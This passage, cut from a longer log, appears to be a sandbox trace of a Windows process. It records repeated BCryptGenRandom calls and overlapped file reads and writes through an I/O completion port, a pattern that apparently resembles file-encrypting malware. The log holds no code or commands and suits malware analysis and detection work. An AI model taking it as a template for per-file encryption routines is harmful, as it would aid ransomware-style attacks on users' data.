GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0184.529] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.529] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.529] free (_Block=0x3e305b8) [0184.529] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.529] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.529] free (_Block=0x1fa91d0) [0184.529] free (_Block=0x1fa2ed8) [0184.529] free (_Block=0x1fa90b8) [0184.529] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0184.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.535] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0184.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0184.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0184.544] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.544] free (_Block=0x3e305b8) [0184.544] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.544] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.545] free (_Block=0x1fa91d0) [0184.545] free (_Block=0x1fa2ed8) [0184.545] free (_Block=0x1fa90b8) [0184.545] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0184.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.569] CloseHandle (hObject=0x2a4) returned 1 [0184.570] free (_Block=0x3df0008) [0184.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.581] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.592] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0184.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.601] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0184.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.604] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0184.605] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.525] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x581, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.532] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x15fa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.546] CloseHandle (hObject=0x2a4) returned 1 [0185.547] free (_Block=0x3d70450) [0185.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.558] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0185.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0185.559] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.559] free (_Block=0x3e305b8) [0185.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.559] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.560] free (_Block=0x1fa91d0) [0185.560] free (_Block=0x1fa2ed8) [0185.560] free (_Block=0x1fa90b8) [0185.560] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0185.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.572] CloseHandle (hObject=0x3cc) returned 1 [0185.572] free (_Block=0x3f70048) [0185.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.588] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x579, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0185.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.598] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4ac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0185.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.626] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.629] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.772] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.773] CloseHandle (hObject=0x170) returned 1 [0185.773] free (_Block=0x3df0008) [0185.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0185.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0185.787] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.787] free (_Block=0x3e305b8) [0185.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.787] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.787] free (_Block=0x1fa91d0) [0185.787] free (_Block=0x1fa2ed8) [0185.787] free (_Block=0x1fa90b8) [0185.787] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.796] CloseHandle (hObject=0x330) returned 1 [0185.797] free (_Block=0x3d70450) [0185.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.809] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0185.809] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.817] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x11098, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.840] CloseHandle (hObject=0x330) returned 1 [0185.840] free (_Block=0x3d70450) [0185.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.850] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15a56, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0185.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.904] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x17640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0185.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0185.923] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x18c11, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.492] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1240d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0187.500] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.553] CloseHandle (hObject=0x170) returned 1 [0187.553] free (_Block=0x3d70450) [0187.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0187.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0187.559] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.559] free (_Block=0x3e305b8) [0187.560] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.560] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.560] free (_Block=0x1fa91d0) [0187.560] free (_Block=0x1fa2ed8) [0187.560] free (_Block=0x1fa90b8) [0187.560] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0187.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.564] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xc280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0187.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0187.572] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.572] free (_Block=0x3e305b8) [0187.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.572] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.572] free (_Block=0x1fa91d0) [0187.572] free (_Block=0x1fa2ed8) [0187.572] free (_Block=0x1fa90b8) [0187.572] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0187.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.582] CloseHandle (hObject=0x3cc) returned 1 [0187.582] free (_Block=0x3e70008) [0187.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.587] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xf814, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.604] CloseHandle (hObject=0x338) returned 1 [0187.604] free (_Block=0x3f70048) [0187.604] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0187.606] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xd2e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0190.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.186] CloseHandle (hObject=0x3cc) returned 1 [0190.186] free (_Block=0x3e70008) [0190.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.195] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0190.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.201] CloseHandle (hObject=0x170) returned 1 [0190.202] free (_Block=0x3d70450) [0190.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0190.204] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, 